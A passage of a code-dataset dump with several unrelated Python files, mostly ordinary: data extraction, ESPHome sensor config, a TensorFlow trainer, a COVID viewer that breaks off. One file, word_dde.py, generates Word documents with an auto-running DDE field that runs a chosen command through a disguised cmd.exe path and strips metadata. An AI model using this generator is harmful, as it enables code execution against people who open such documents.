Contact us !\")\n    # TODO Extract channel maps from meta-data\n    raw_ephys_apfile = ephys_files[0]\n    sr = ibllib.io.spikeglx.Reader(raw_ephys_apfile)\n    sync = _sync_to_alf(sr, output_path, save=save)\n    # TODO Extract camera time-stamps\n    extract_wheel_sync(sync, output_path, save=save)\n    extract_behaviour_sync(sync, output_path, save=save)\n    align_with_bpod(session_path)  # checks consistency and computes dt with bpod\n","sub_path":"ibllib/io/extractors/ephys_fpga.py","file_name":"ephys_fpga.py","file_ext":"py","file_size_in_byte":16287,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"305415437","text":"import random\n\ndef equallyLiklyShuffleArray(arr):\n    start = 0\n    end = len(arr) -1\n    i = 0\n    while i < end:\n        idx = random.randint(i,end)\n        # swap the value at the current index with the value at the random index,\n        # masking the current position out of future random selections\n        arr[i] , arr[idx] = arr[idx], arr[i]\n        i +=1\n    return arr\n\nif __name__ == \"__main__\":\n    arr = [1,2,3,4]\n    i = 10\n    while i > 0:\n        print(\"Shuffle arr:\",equallyLiklyShuffleArray(arr))\n        i -=1\n\n","sub_path":"iterator/equallyLikely.py","file_name":"equallyLikely.py","file_ext":"py","file_size_in_byte":502,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"478362524","text":"import os.path\r\nfrom random import shuffle\r\n\r\npath = \"ml-100k/\"\r\n\r\n\"\"\"\r\n@brief Splits the dataset into parts of equal size\r\n\r\n@param arquivo Name of the input file\r\n@param divisoes Number of splits of the dataset\r\n@return dados_divididos The splits of the dataset\r\n\r\n\"\"\"\r\ndef dividir_base(arquivo, divisoes=5):\r\n\r\n\tdados = open(arquivo, 'r', encoding=\"utf-8\").readlines()\r\n\r\n\ttamanho = len(dados)\r\n\r\n\tif (tamanho % divisoes) != 0:\r\n\t\tprint(\"The number of splits does not produce parts of equal size!\")\r\n\t\treturn None\r\n\r\n\ttamanho_parte = tamanho/ divisoes\r\n\r\n\tnome_base = path + \"base_%s.txt\"\r\n\r\n\tdados_divididos = []\r\n\r\n\tarquivos_existem = True\r\n\r\n\tfor i in range(divisoes):\r\n\r\n\t\tnome = nome_base % (i+1,)\r\n\r\n\t\tif os.path.exists(nome):\r\n\t\t\tf = open(nome_base % (i+1,), 'r')\r\n\r\n\t\t\tarquivos_existem = arquivos_existem and (len(f.readlines()) == tamanho_parte)\r\n\t\telse:\r\n\t\t\tarquivos_existem = False\r\n\r\n\tif not arquivos_existem:\r\n\r\n\t\tshuffle(dados)\r\n\r\n\t\tfor i in range(divisoes):\r\n\t\t\tdados_divididos.append( dados[ int(i*tamanho_parte) : int((i+1)*tamanho_parte)] )\r\n\r\n\t\t\twith open(nome_base % (i+1,), 'w') as f:\r\n\t\t\t\tfor linha in dados_divididos[i]:\r\n\t\t\t\t\tf.write(linha)\r\n\r\n\telse:\r\n\t\tfor i in range(divisoes):\r\n\t\t\twith open(nome_base % (i+1,), 'r') as f:\r\n\t\t\t\tdados_divididos.append(f.readlines())\r\n\r\n\treturn dados_divididos\r\n\r\n\"\"\"\r\n@brief Computes the mean absolute error\r\n\r\nGiven the ground truth and the predictions, computes the mean absolute error\r\n\r\n@param gabarito Ground truth of the test\r\n@param predito List of test predictions\r\n@return mae Mean absolute error\r\n\r\n\"\"\"\r\ndef calcular_mae(gabarito, predito):\r\n\tmae = 0\r\n\tt = 0\r\n\tfor i in range(len(predito)):\r\n\t\tif predito[i] > 0:\r\n\t\t\tmae += abs(gabarito[i] - predito[i])\r\n\t\t\tt = t + 1\r\n\tmae /= t\r\n\treturn mae\r\n\r\ndef calcular_rmse(gabarito, predito):\r\n\trmse = 0\r\n\tt = 0\r\n\tfor i in range(len(predito)):\r\n\t\tif predito[i] > 0:\r\n\t\t\trmse += (gabarito[i] - 
predito[i])**2\r\n\t\t\tt = t + 1\r\n\trmse = (rmse/t)**.5\r\n\treturn rmse\r\n","sub_path":"Prediction/KNN/Envio/cross_validation.py","file_name":"cross_validation.py","file_ext":"py","file_size_in_byte":1995,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"320673132","text":"from esphome.components.atm90e32.sensor import CONF_PHASE_A, CONF_PHASE_B, CONF_PHASE_C\nimport esphome.codegen as cg\nimport esphome.config_validation as cv\nfrom esphome.components import sensor, modbus\nfrom esphome.const import (\n CONF_ACTIVE_POWER,\n CONF_CURRENT,\n CONF_FREQUENCY,\n CONF_ID,\n CONF_POWER_FACTOR,\n CONF_REACTIVE_POWER,\n CONF_VOLTAGE,\n CONF_ENERGY,\n DEVICE_CLASS_CURRENT,\n DEVICE_CLASS_EMPTY,\n DEVICE_CLASS_ENERGY,\n DEVICE_CLASS_POWER,\n DEVICE_CLASS_POWER_FACTOR,\n DEVICE_CLASS_VOLTAGE,\n DEVICE_CLASS_TEMPERATURE,\n ICON_CURRENT_AC,\n ICON_EMPTY,\n ICON_FLASH,\n STATE_CLASS_MEASUREMENT,\n STATE_CLASS_NONE,\n UNIT_AMPERE,\n UNIT_DEGREES,\n UNIT_EMPTY,\n UNIT_HERTZ,\n UNIT_VOLT,\n UNIT_VOLT_AMPS,\n UNIT_VOLT_AMPS_REACTIVE,\n UNIT_VOLT_AMPS_REACTIVE_HOURS,\n UNIT_WATT,\n UNIT_WATT_HOURS,\n UNIT_MINUTE,\n)\n\nCONF_ENERGY_PRODUCTION_DAY = \"energy_production_day\"\nCONF_TOTAL_ENERGY_PRODUCTION = \"total_energy_production\"\nCONF_TOTAL_GENERAION_TIME = \"total_generation_time\"\nCONF_TODAY_GENERAION_TIME = \"today_generation_time\"\nCONF_PV1 = \"pv_1\"\nCONF_PV2 = \"pv_2\"\nUNIT_KILOWATT_HOURS = \"kWh\"\nUNIT_HOURS = \"hrs\"\nUNIT_KOHM = \"KΩ\"\nUNIT_MILIAMPERE = \"mA\"\n\n\nCONF_INVERTER_MODULE_TEMP = \"inverter_module_temp\" \nCONF_INVERTER_INNER_TEMP = \"inverter_inner_temp\" \nCONF_INVERTER_BUS_VOLTAGE = \"inverter_bus_voltage\" \nCONF_PV1_VOLTAGE_SAMPLED_BY_SLAVE_CPU = \"pv1_volt_sampled_by_slave_cpu\"\nCONF_PV2_VOLTAGE_SAMPLED_BY_SLAVE_CPU = \"pv2_volt_sampled_by_slave_cpu\" \nCONF_INSULATION_OF_PV1_P_TO_GROUND = \"insulation_pv1_p_to_ground\" \nCONF_INSULATION_OF_PV2_P_TO_GROUND = \"insulation_pv2_p_to_ground\" \nCONF_INSULATION_OF_PV_N_TO_GROUND = \"insulation_pv_n_to_ground\" \nCONF_GFCI_VALUE = \"gfci_value\" \nCONF_DCI_OF_R = \"dci_of_r\" \nCONF_DCI_OF_S = \"dci_of_s\" \nCONF_DCI_OF_T = \"dci_of_t\" \n\n\nAUTO_LOAD = [\"modbus\"]\nCODEOWNERS = [\"@sourabhjaiswal\"]\n\nhavells_solar_ns = cg.esphome_ns.namespace(\"havells_solar\")\nHAVELLSSolar = havells_solar_ns.class_(\"HAVELLSSolar\", cg.PollingComponent, modbus.ModbusDevice)\n\nPHASE_SENSORS = {\n CONF_VOLTAGE: sensor.sensor_schema(UNIT_VOLT, ICON_EMPTY, 2, DEVICE_CLASS_VOLTAGE),\n CONF_CURRENT: sensor.sensor_schema(\n UNIT_AMPERE, ICON_EMPTY, 2, DEVICE_CLASS_CURRENT, STATE_CLASS_MEASUREMENT\n ),\n}\nPV_SENSORS = {\n CONF_VOLTAGE: sensor.sensor_schema(UNIT_VOLT, ICON_EMPTY, 2, DEVICE_CLASS_VOLTAGE),\n CONF_CURRENT: sensor.sensor_schema(\n UNIT_AMPERE, ICON_EMPTY, 2, DEVICE_CLASS_CURRENT, STATE_CLASS_MEASUREMENT\n ),\n CONF_ACTIVE_POWER: sensor.sensor_schema(\n UNIT_WATT, ICON_EMPTY, 0, DEVICE_CLASS_POWER, STATE_CLASS_MEASUREMENT\n ),\n}\n\nPHASE_SCHEMA = cv.Schema(\n {cv.Optional(sensor): schema for sensor, schema in PHASE_SENSORS.items()}\n)\nPV_SCHEMA = cv.Schema(\n {cv.Optional(sensor): schema for sensor, schema in PV_SENSORS.items()}\n)\n\nCONFIG_SCHEMA = (\n cv.Schema(\n {\n cv.GenerateID(): cv.declare_id(HAVELLSSolar),\n cv.Optional(CONF_PHASE_A): PHASE_SCHEMA,\n cv.Optional(CONF_PHASE_B): PHASE_SCHEMA,\n cv.Optional(CONF_PHASE_C): PHASE_SCHEMA,\n cv.Optional(CONF_PV1): PV_SCHEMA,\n cv.Optional(CONF_PV2): PV_SCHEMA,\n cv.Optional(CONF_FREQUENCY): sensor.sensor_schema(\n 
UNIT_HERTZ,\n ICON_CURRENT_AC,\n 2,\n DEVICE_CLASS_EMPTY,\n STATE_CLASS_MEASUREMENT,\n ),\n cv.Optional(CONF_ACTIVE_POWER): sensor.sensor_schema(\n UNIT_WATT,\n ICON_EMPTY,\n 0,\n DEVICE_CLASS_POWER,\n STATE_CLASS_MEASUREMENT\n ),\n cv.Optional(CONF_REACTIVE_POWER): sensor.sensor_schema(\n UNIT_VOLT_AMPS_REACTIVE,\n ICON_EMPTY,\n 2,\n DEVICE_CLASS_POWER,\n STATE_CLASS_MEASUREMENT,\n ),\n cv.Optional(CONF_ENERGY_PRODUCTION_DAY): sensor.sensor_schema(\n UNIT_KILOWATT_HOURS,\n ICON_EMPTY,\n 2,\n DEVICE_CLASS_ENERGY,\n STATE_CLASS_MEASUREMENT,\n ),\n cv.Optional(CONF_TOTAL_ENERGY_PRODUCTION): sensor.sensor_schema(\n UNIT_KILOWATT_HOURS,\n ICON_EMPTY,\n 0,\n DEVICE_CLASS_ENERGY,\n STATE_CLASS_MEASUREMENT,\n ),\n cv.Optional(CONF_TOTAL_GENERAION_TIME): sensor.sensor_schema(\n UNIT_HOURS,\n ICON_EMPTY,\n 0,\n DEVICE_CLASS_EMPTY,\n STATE_CLASS_MEASUREMENT,\n ),\n cv.Optional(CONF_TODAY_GENERAION_TIME): sensor.sensor_schema(\n UNIT_MINUTE,\n ICON_EMPTY,\n 0,\n DEVICE_CLASS_EMPTY,\n STATE_CLASS_MEASUREMENT,\n ),\n cv.Optional(CONF_INVERTER_MODULE_TEMP): sensor.sensor_schema(\n UNIT_DEGREES,\n ICON_EMPTY,\n 0,\n DEVICE_CLASS_EMPTY,\n STATE_CLASS_MEASUREMENT,\n ),\n cv.Optional(CONF_INVERTER_INNER_TEMP): sensor.sensor_schema(\n UNIT_DEGREES,\n ICON_EMPTY,\n 0,\n DEVICE_CLASS_EMPTY,\n STATE_CLASS_MEASUREMENT,\n ),\n cv.Optional(CONF_INVERTER_BUS_VOLTAGE): sensor.sensor_schema(\n UNIT_VOLT,\n ICON_EMPTY,\n 0,\n DEVICE_CLASS_EMPTY,\n STATE_CLASS_MEASUREMENT,\n ),\n cv.Optional(CONF_PV1_VOLTAGE_SAMPLED_BY_SLAVE_CPU): sensor.sensor_schema(\n UNIT_VOLT,\n ICON_EMPTY,\n 0,\n DEVICE_CLASS_EMPTY,\n STATE_CLASS_MEASUREMENT,\n ),\n cv.Optional(CONF_PV2_VOLTAGE_SAMPLED_BY_SLAVE_CPU): sensor.sensor_schema(\n UNIT_VOLT,\n ICON_EMPTY,\n 0,\n DEVICE_CLASS_EMPTY,\n STATE_CLASS_MEASUREMENT,\n ),\n cv.Optional(CONF_INSULATION_OF_PV1_P_TO_GROUND): sensor.sensor_schema(\n UNIT_KOHM,\n ICON_EMPTY,\n 0,\n DEVICE_CLASS_EMPTY,\n STATE_CLASS_MEASUREMENT,\n ),\n cv.Optional(CONF_INSULATION_OF_PV2_P_TO_GROUND): sensor.sensor_schema(\n UNIT_KOHM,\n ICON_EMPTY,\n 0,\n DEVICE_CLASS_EMPTY,\n STATE_CLASS_MEASUREMENT,\n ),\n cv.Optional(CONF_INSULATION_OF_PV_N_TO_GROUND): sensor.sensor_schema(\n UNIT_KOHM,\n ICON_EMPTY,\n 0,\n DEVICE_CLASS_EMPTY,\n STATE_CLASS_MEASUREMENT,\n ),\n cv.Optional(CONF_GFCI_VALUE): sensor.sensor_schema(\n UNIT_MILIAMPERE,\n ICON_EMPTY,\n 0,\n DEVICE_CLASS_EMPTY,\n STATE_CLASS_MEASUREMENT,\n ),\n cv.Optional(CONF_DCI_OF_R): sensor.sensor_schema(\n UNIT_MILIAMPERE,\n ICON_EMPTY,\n 0,\n DEVICE_CLASS_EMPTY,\n STATE_CLASS_MEASUREMENT,\n ),\n cv.Optional(CONF_DCI_OF_S): sensor.sensor_schema(\n UNIT_MILIAMPERE,\n ICON_EMPTY,\n 0,\n DEVICE_CLASS_EMPTY,\n STATE_CLASS_MEASUREMENT,\n ),\n cv.Optional(CONF_DCI_OF_T): sensor.sensor_schema(\n UNIT_MILIAMPERE,\n ICON_EMPTY,\n 0,\n DEVICE_CLASS_EMPTY,\n STATE_CLASS_MEASUREMENT,\n ),\n }\n )\n .extend(cv.polling_component_schema(\"10s\"))\n .extend(modbus.modbus_device_schema(0x01))\n)\n\n\nasync def to_code(config):\n var = cg.new_Pvariable(config[CONF_ID])\n await cg.register_component(var, config)\n await modbus.register_modbus_device(var, config)\n\n if CONF_FREQUENCY in config:\n sens = await sensor.new_sensor(config[CONF_FREQUENCY])\n cg.add(var.set_frequency_sensor(sens))\n \n if CONF_ACTIVE_POWER in config:\n sens = await sensor.new_sensor(config[CONF_ACTIVE_POWER])\n cg.add(var.set_active_power_sensor(sens))\n \n if CONF_REACTIVE_POWER in config:\n sens = await sensor.new_sensor(config[CONF_REACTIVE_POWER])\n cg.add(var.set_reactive_power_sensor(sens))\n\n if 
CONF_ENERGY_PRODUCTION_DAY in config:\n sens = await sensor.new_sensor(config[CONF_ENERGY_PRODUCTION_DAY])\n cg.add(var.set_today_production_sensor(sens))\n\n if CONF_TOTAL_ENERGY_PRODUCTION in config:\n sens = await sensor.new_sensor(config[CONF_TOTAL_ENERGY_PRODUCTION])\n cg.add(var.set_total_energy_production_sensor(sens))\n\n if CONF_TOTAL_GENERAION_TIME in config:\n sens = await sensor.new_sensor(config[CONF_TOTAL_GENERAION_TIME])\n cg.add(var.set_total_generation_time_sensor(sens))\n\n if CONF_TODAY_GENERAION_TIME in config:\n sens = await sensor.new_sensor(config[CONF_TODAY_GENERAION_TIME])\n cg.add(var.set_today_generation_time_sensor(sens))\n\n if CONF_INVERTER_MODULE_TEMP in config:\n sens = await sensor.new_sensor(config[CONF_INVERTER_MODULE_TEMP])\n cg.add(var.set_inverter_module_temp_sensor(sens))\n\n if CONF_INVERTER_INNER_TEMP in config:\n sens = await sensor.new_sensor(config[CONF_INVERTER_INNER_TEMP])\n cg.add(var.set_inverter_inner_temp_sensor(sens))\n\n if CONF_INVERTER_BUS_VOLTAGE in config:\n sens = await sensor.new_sensor(config[CONF_INVERTER_BUS_VOLTAGE])\n cg.add(var.set_inverter_bus_voltage_sensor(sens))\n\n if CONF_PV1_VOLTAGE_SAMPLED_BY_SLAVE_CPU in config:\n sens = await sensor.new_sensor(config[CONF_PV1_VOLTAGE_SAMPLED_BY_SLAVE_CPU])\n cg.add(var.set_pv1_volt_sampled_by_slave_cpu_sensor(sens))\n\n if CONF_PV2_VOLTAGE_SAMPLED_BY_SLAVE_CPU in config:\n sens = await sensor.new_sensor(config[CONF_PV2_VOLTAGE_SAMPLED_BY_SLAVE_CPU])\n cg.add(var.set_pv2_volt_sampled_by_slave_cpu_sensor(sens))\n\n if CONF_INSULATION_OF_PV1_P_TO_GROUND in config:\n sens = await sensor.new_sensor(config[CONF_INSULATION_OF_PV1_P_TO_GROUND])\n cg.add(var.set_insulation_pv1_p_to_ground_sensor(sens))\n\n if CONF_INSULATION_OF_PV2_P_TO_GROUND in config:\n sens = await sensor.new_sensor(config[CONF_INSULATION_OF_PV2_P_TO_GROUND])\n cg.add(var.set_insulation_pv2_p_to_ground_sensor(sens))\n\n if CONF_INSULATION_OF_PV_N_TO_GROUND in config:\n sens = await sensor.new_sensor(config[CONF_INSULATION_OF_PV_N_TO_GROUND])\n cg.add(var.set_insulation_pv_n_to_ground_sensor(sens))\n\n if CONF_GFCI_VALUE in config:\n sens = await sensor.new_sensor(config[CONF_GFCI_VALUE])\n cg.add(var.set_gfci_value_sensor(sens))\n\n if CONF_DCI_OF_R in config:\n sens = await sensor.new_sensor(config[CONF_DCI_OF_R])\n cg.add(var.set_dci_of_r_sensor(sens))\n\n if CONF_DCI_OF_S in config:\n sens = await sensor.new_sensor(config[CONF_DCI_OF_S])\n cg.add(var.set_dci_of_s_sensor(sens))\n\n if CONF_DCI_OF_T in config:\n sens = await sensor.new_sensor(config[CONF_DCI_OF_T])\n cg.add(var.set_dci_of_t_sensor(sens))\n\n for i, phase in enumerate([CONF_PHASE_A, CONF_PHASE_B, CONF_PHASE_C]):\n if phase not in config:\n continue\n\n phase_config = config[phase]\n for sensor_type in PHASE_SENSORS:\n if sensor_type in phase_config:\n sens = await sensor.new_sensor(phase_config[sensor_type])\n cg.add(getattr(var, f\"set_{sensor_type}_sensor\")(i, sens))\n \n for i, pv in enumerate([CONF_PV1, CONF_PV2]):\n if pv not in config:\n continue\n\n pv_config = config[pv]\n for sensor_type in pv_config:\n if sensor_type in pv_config:\n sens = await sensor.new_sensor(pv_config[sensor_type])\n cg.add(getattr(var, f\"set_{sensor_type}_sensor_pv\")(i, sens))\n","sub_path":"sensor.py","file_name":"sensor.py","file_ext":"py","file_size_in_byte":12532,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"253565841","text":"#!/usr/bin/python\n# coding=utf-8\n\nimport util\nimport constants as C\n\nclass 
car:\n def __init__(self, pos = None, dir = None):\n if pos:\n self.position = util.coordinate(pos)\n else:\n self.position = C.DEFAULT_POSITION\n\n if dir:\n self.direction = dir \n else:\n self.direction = C.DEFAULT_DIRECTION \n\n self.touching = None\n\n def move(self, squares = 1):\n self.position += C.DIRECTION_POSITION_MAP(self.direction) * squares\n \n\n def __repr__(self):\n return \"Pos: \" + str(self.position) + \" Dir:\" + str(self.direction)\n","sub_path":"algo-data-structures/maze/lib/car.py","file_name":"car.py","file_ext":"py","file_size_in_byte":551,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
{"seq_id":"352733239","text":"from collections import namedtuple\nimport tensorflow as tf\nfrom tensorflow.python.util import nest\nfrom tensorflow.python.platform import gfile\nfrom tensorflow.python.lib.io import file_io\nfrom tensorflow.python.framework.errors import ResourceExhaustedError\n\nimport multiprocessing\nimport utils as libutils\nimport model_config\nimport model_analysis\nimport data_config\nimport batch_allreduce\nimport logging\nimport numpy as np\nimport time\nimport os\nimport random\nimport re\nimport myelindl\nimport math\n\n# from HPOlib.myHPO import SmacWrapper\n\nfrom benchmark_cnn import BenchmarkCNN\n\nflags = tf.app.flags\nFLAGS = tf.app.flags.FLAGS\nlogging.basicConfig(format='%(asctime)s [%(levelname)s] %(message)s',\n datefmt='%Y-%m-%d %H:%M:%S',\n level=logging.INFO)\n\nflags.DEFINE_integer('num_gpus', 1, 'the number of GPUs to run on')\nflags.DEFINE_enum('device', 'gpu', ('cpu', 'gpu'),\n 'Device to use for computation: cpu or gpu')\nflags.DEFINE_enum('data_format', 'NCHW', ('NHWC', 'NCHW'),\n 'Data layout to use: NHWC (TF native) or NCHW (cuDNN '\n 'native, requires GPU).')\n# the ps server uses the cpu device unless local_parameter_device_flag is set to 'gpu'\n# ref: https://github.com/tensorflow/benchmarks/blob/master/scripts/tf_cnn_benchmarks/variable_mgr.py#L183-L225\nflags.DEFINE_enum('variable_update', 'replicated',\n ('parameter_server', 'replicated', 'cpu_recomputing'),\n 'The method for managing variables: parameter_server, '\n 'replicated')\n# memory saving method; some methods need a matching variable_update setting, \n# ex: recomputing <-> cpu_recomputing\nflags.DEFINE_string('memory_saving_method', None,\n 'setup the memory saving method, 1. recomputing 2. TBD ')\nflags.DEFINE_integer('summary_verbosity', 0, 'Verbosity level for summary ops. '\n 'level 0: disable any summary.\n'\n 'level 1: small and fast ops, e.g.: learning_rate, '\n 'total_loss.\n'\n 'level 2: medium-cost ops, e.g. histogram of all '\n 'gradients.\n'\n 'level 3: expensive ops: images and histogram of each '\n 'gradient.\n')\nflags.DEFINE_string('train_dir', None,\n 'Path to session checkpoints. Pass None to disable saving '\n 'checkpoint at the end.')\nflags.DEFINE_string('networkDirectory', None,\n 'The directory where the model file is placed')\nflags.DEFINE_string('network', 'network.py',\n 'The network file name')\nflags.DEFINE_string('save', None,\n 'Path to session checkpoints. 
Pass None to disable saving '\n 'checkpoint at the end.')\nflags.DEFINE_string('train_db', None,\n 'Path to train dataset in TFRecord format.')\nflags.DEFINE_string('validation_db', None,\n 'Path to validation dataset in TFRecord format.')\nflags.DEFINE_string('labels_list', None,\n 'list of labels file ')\nflags.DEFINE_string('visualizeModelPath', None,\n 'Constructs the current model for visualization.')\nflags.DEFINE_integer('save_summaries_steps', 100,\n 'How often to save summaries for trained models. Pass 0 '\n 'to disable summaries.')\nflags.DEFINE_integer('display_every', 10,\n 'Number of local steps after which progress is printed '\n 'out')\n# tf Option\nflags.DEFINE_integer('num_intra_threads', 1,\n 'Number of threads to use for intra-op parallelism. If '\n 'set to 0, the system will pick an appropriate number.')\nflags.DEFINE_integer('num_inter_threads', 0,\n 'Number of threads to use for inter-op parallelism. If '\n 'set to 0, the system will pick an appropriate number.')\nflags.DEFINE_boolean('force_gpu_compatible', False,\n 'whether to enable force_gpu_compatible in GPU_Options')\nflags.DEFINE_boolean('allow_growth', False,\n 'whether to enable allow_growth in GPU_Options')\nflags.DEFINE_float('gpu_memory_frac_for_testing', 0,\n 'If non-zero, the fraction of GPU memory that will be used. '\n 'Useful for testing the benchmark script, as this allows '\n 'distributed mode to be run on a single machine. For '\n 'example, if there are two tasks, each can be allocated '\n '~40 percent of the memory on a single machine',\n lower_bound=0., upper_bound=1.)\nflags.DEFINE_boolean('xla', False, 'whether to enable XLA')\nflags.DEFINE_boolean('enable_layout_optimizer', False,\n 'whether to enable layout optimizer')\n# hparams\nflags.DEFINE_enum('optimizer', 'sgd', ('momentum', 'sgd', 'rmsprop'),\n 'Optimizer to use: momentum or sgd or rmsprop')\nflags.DEFINE_string('piecewise_learning_rate_schedule', '0.1;1;0.1',\n 'Specifies a piecewise learning rate schedule based on the '\n 'number of epochs. This is the form LR0;E1;LR1;...;En;LRn, '\n 'where each LRi is a learning rate and each Ei is an epoch '\n 'indexed from 0. The learning rate is LRi if the '\n 'E(i-1) <= current_epoch < Ei. For example, if this '\n 'paramater is 0.3;10;0.2;25;0.1, the learning rate is 0.3 '\n 'for the first 10 epochs, then is 0.2 for the next 15 '\n 'epochs, then is 0.1 until training ends.')\nflags.DEFINE_float('weight_decay', 0.00004,\n 'Weight decay factor for training.')\nflags.DEFINE_float('epoch', 1.,\n 'number of epochs to run, excluding warmup. 
'\n 'This and --num_batches cannot both be specified.')\nflags.DEFINE_integer('batch_size', 0, 'batch size per compute device')\nflags.DEFINE_float('num_learning_rate_warmup_epochs', 0,\n 'Slowly increase to the initial learning rate in the first '\n 'num_learning_rate_warmup_epochs linearly.')\n# flags.DEFINE_float('warmup_init_lr', 0.1, 'initial lr of warmup')\nflags.DEFINE_boolean('eval', False, 'whether use eval or benchmarking')\nflags.DEFINE_integer('small_chunk', 1, 'number of times to accumulate gradents')\n# data aug\nflags.DEFINE_boolean('aug_flip', True, 'whether randomly flip left or right dataset')\nflags.DEFINE_boolean('color_augmentation', True, 'whether randomly color augmentation dataset')\nflags.DEFINE_integer('resize_pad', 0, 'image size for random resize and pad image')\nflags.DEFINE_enum('resize_method', 'round_robin',\n ('round_robin', 'nearest', 'bilinear', 'bicubic', 'area'),\n 'Dataset resize method.')\nflags.DEFINE_float('init_learning_rate', None, 'initial learning rate for exponential decay')\nflags.DEFINE_float('learning_rate_decay_factor', None, 'gamma for exponential decay')\nflags.DEFINE_integer('learning_rate_exp_step', 50, 'steps for exponential decay')\nflags.DEFINE_enum('lr_policy', 'multistep', ('multistep', 'exp'),\n 'Type of learning rate policy')\nflags.DEFINE_boolean('test_max_batch_size', False, 'If this flag trun on (TRUE), we just test '\n 'the max batch size, and ignore almost other fields')\nflags.DEFINE_integer('start_batch_size', 32, 'When we test max_batch size from start_batch_size')\n\nflags.DEFINE_integer('stop_accu_epoch', 0, 'early stop when accuracy does not increase 1% for'\n 'numbers of epochs')\n\ndef tensorflow_version_tuple():\n v = tf.__version__\n major, minor, patch = v.split('.')\n return (int(major), int(minor), patch)\n\n\ndef test_max_batch_size(num_gpu=1, start_size=512, limit=None):\n min = num_gpu\n if num_gpu > start_size:\n logging.error(\"start_size must bigger then num_gpu, current start_size {}\".format(start_size))\n return 0\n\n size = batch_size_regulation(num_gpu, start_size)\n while size != min:\n logging.info(\"Test Batch Size {}, s:{}, b:{}, l:{}.\".format(size, size, min, limit))\n if test_batch_size(size):\n if limit:\n # found max\n break\n min = size\n size = batch_size_regulation(num_gpu, (size * 2) if not limit else size + (limit - size) // 2)\n else:\n if min > num_gpu:\n # found max\n size = min\n break\n limit = size\n size = batch_size_regulation(num_gpu, min + (size - min) // 2)\n logging.info(\"Max Batch Size found {}.\".format(size))\n return size\n\n\ndef batch_size_regulation(num_gpu, size):\n if num_gpu <= 1:\n return size\n return (size // num_gpu) * num_gpu\n\n\ndef test_batch_size(size):\n # test with batch size\n pass_test = False\n model = None\n try:\n with tf.Graph().as_default():\n FLAGS.batch_size = size\n FLAGS.num_gpus = 1\n model = BenchmarkCNN(FLAGS)\n model.setup()\n model.print_info()\n\n # override batch test parameters\n model.num_epochs = 1\n model.train_batches = 3\n\n model.run()\n pass_test = True\n # except ResourceExhaustedError:\n # logging.info(\"Resource Exhausted when test Batch Size {}\".format(size))\n # logging.exception(\"Resource Exhausted when test Batch Size {}\".format(size))\n except:\n # logging.error(\"Error Happened when test Batch Size {}\".format(size))\n # raise\n logging.info(\"Resource Exhausted when test Batch Size {}\".format(size))\n finally:\n if model:\n del model\n tf.reset_default_graph()\n\n return pass_test\n\n\ndef main(_):\n if 
FLAGS.test_max_batch_size:\n FLAGS.hpo = None\n test_max_batch_size(FLAGS.num_gpus, FLAGS.start_batch_size)\n return\n\n bench = BenchmarkCNN(FLAGS)\n bench.setup()\n tfversion = tensorflow_version_tuple()\n logging.info('TensorFlow: %i.%i' % (tfversion[0], tfversion[1]))\n\n bench.print_info()\n acc = bench.run()\n\n\nif __name__ == '__main__':\n tf.app.run()\n","sub_path":"myelindl/tools/tf/trainer.py","file_name":"trainer.py","file_ext":"py","file_size_in_byte":10486,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"409723294","text":"#!/usr/bin/env python\n# encoding: utf-8\n\n# Only enabled on windows\nimport sys\nfrom common.utils import MSTypes\nif sys.platform == \"win32\":\n # Download and install pywin32 from https://sourceforge.net/projects/pywin32/files/pywin32/\n import win32com.client # @UnresolvedImport\n\nimport logging\nfrom modules.word_gen import WordGenerator\n\n\nclass WordDDE(WordGenerator):\n \"\"\" \n Module used to generate MS Word file with DDE object attack\n Inspired by: https://sensepost.com/blog/2017/macro-less-code-exec-in-msword/\n \"\"\"\n \n \n def run(self):\n logging.info(\" [+] Generating MS Word with DDE document...\")\n \n # Read command file\n commandFile =self.getCMDFile() \n if commandFile == \"\":\n logging.error(\" [!] Could not find cmd input!\")\n return\n\n logging.info(\" [-] Open document...\")\n # open up an instance of Word with the win32com driver\n word = win32com.client.Dispatch(\"Word.Application\")\n # do the operation in background without actually opening Excel\n word.Visible = False\n document = word.Documents.Open(self.outputFilePath)\n\n logging.info(\" [-] Inject DDE field (Answer 'No' to popup)...\")\n with open (commandFile, \"r\") as f:\n command=f.read()\n \n ddeCmd = r'\"\\\"c:\\\\Program Files\\\\Microsoft Office\\\\MSWORD\\\\..\\\\..\\\\..\\\\windows\\\\system32\\\\cmd.exe\\\" /c %s\" \".\"' % command.rstrip()\n wdFieldDDEAuto=46\n document.Fields.Add(Range=word.Selection.Range,Type=wdFieldDDEAuto, Text=ddeCmd, PreserveFormatting=False)\n \n # save the document and close\n word.DisplayAlerts=False\n # Remove Informations\n logging.info(\" [-] Remove hidden data and personal info...\")\n wdRDIAll=99\n document.RemoveDocumentInformation(wdRDIAll)\n logging.info(\" [-] Save Document...\")\n document.Save()\n document.Close()\n word.Application.Quit()\n # garbage collection\n del word\n \n logging.info(\" [-] Generated %s file path: %s\" % (self.outputFileType, self.outputFilePath))\n \n \n ","sub_path":"src/modules/word_dde.py","file_name":"word_dde.py","file_ext":"py","file_size_in_byte":2166,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"572408037","text":"from tkinter import *\nimport covid\nfrom matplotlib import pyplot as plt\nfrom covid import Covid\nfrom PIL import ImageTk, Image\n#import patches to scale the data\nimport matplotlib.patches as mpatches\n\n\n#initializing covid library\ncovid = Covid()\n\npathoftheimage = 'C:/Users/kurtk/OneDrive/Desktop/DontOpen/Python/Projects/Covid19Update/covback.jpg'\n\n#initializing tkinter\nwindow = Tk()\nwindow.geometry(\"350x470\")\nwindow.config(bg=\"#416C7B\")\nwindow.title(\"Covid-19 Update Based on Countries\")\nicon = PhotoImage(file='C:/Users/kurtk/OneDrive/Desktop/DontOpen/Python/Projects/Covid19Update/image.png')\nwindow.iconphoto(True,icon)\n\nimg = ImageTk.PhotoImage(Image.open(pathoftheimage))\npanel = Label(window, image=img)\npanel.pack()\n\n#get covid 
